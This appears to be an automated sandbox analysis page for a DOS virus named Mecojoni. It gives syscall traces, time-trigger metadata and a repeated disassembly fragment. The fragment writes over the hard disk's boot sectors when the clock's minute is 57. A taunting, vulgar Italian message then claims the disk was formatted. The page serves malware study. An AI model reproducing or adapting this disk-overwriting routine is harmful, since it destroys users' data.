Sample viewer

vx.netlux.org/Virus.DOS.FaxFree.Mecojoni.g

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:53:45.403080994Z 74 PC: 12d1b | Reallocate memory
2018-12-17T22:53:45.405661674Z 72 PC: 12d22 | Allocate memory
2018-12-17T22:53:45.407608566Z 44 PC: 13461 | Get time 0x13461: cmp cl, 0x39
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-17T22:53:45.410544215Z 72 PC: 13262 | Allocate memory
2018-12-17T22:53:45.412965699Z 75 PC: 1329d | Execute program
2018-12-17T22:53:45.437386521Z 76 PC: 13934 | Terminate with return code (Return code = '0')
2018-12-17T22:53:45.440694834Z 53 PC: 132b1 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:53:45.442850379Z 37 PC: 132c8 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:53:45.444850743Z 77 PC: 132cc | Get program return code
2018-12-17T22:53:45.446640249Z 49 PC: 132d3 | Terminate and stay resident (Return code = '0' | Memory size = '96')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11329,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:21.624978559Z 74 PC: 12d1b | Reallocate memory
2018-12-25T12:30:21.627316698Z 72 PC: 12d22 | Allocate memory
2018-12-25T12:30:21.629242632Z 44 PC: 13461 | Get time 0x13461: cmp cl, 0x39
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-25T12:30:21.631588846Z 72 PC: 13262 | Allocate memory
2018-12-25T12:30:21.633828905Z 75 PC: 1329d | Execute program
2018-12-25T12:30:21.650479203Z 76 PC: 13934 | Terminate with return code (Return code = '0')
2018-12-25T12:30:21.653833264Z 53 PC: 132b1 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:30:21.655434564Z 37 PC: 132c8 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:30:21.656943274Z 77 PC: 132cc | Get program return code
2018-12-25T12:30:21.658488372Z 49 PC: 132d3 | Terminate and stay resident (Return code = '0' | Memory size = '96')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":57,"Second":0,"TimeBased":true,"OriginalID":11329,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:22.250589812Z 74 PC: 12d1b | Reallocate memory
2018-12-25T12:30:22.253643879Z 72 PC: 12d22 | Allocate memory
2018-12-25T12:30:22.254917529Z 44 PC: 13461 | Get time 0x13461: cmp cl, 0x39
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-25T12:30:22.927920582Z 9 PC: 13489 | Display string (String= 'Ti sentivi sicuro. Avevi lo SCAN !!! Invece lo hai preso nel culo. Infatti il')
2018-12-25T12:30:22.933982385Z 9 PC: 13490 | Display string (String= 'virus MECOJONI ti ha formattato l Hard disk. MECOJONI � un virus self-modifying!')
2018-12-25T12:30:22.941667646Z 9 PC: 13497 | Display string (String= 'Ricordati che la tua presunzione di conoscere i virus � una follia. Arrivederci.')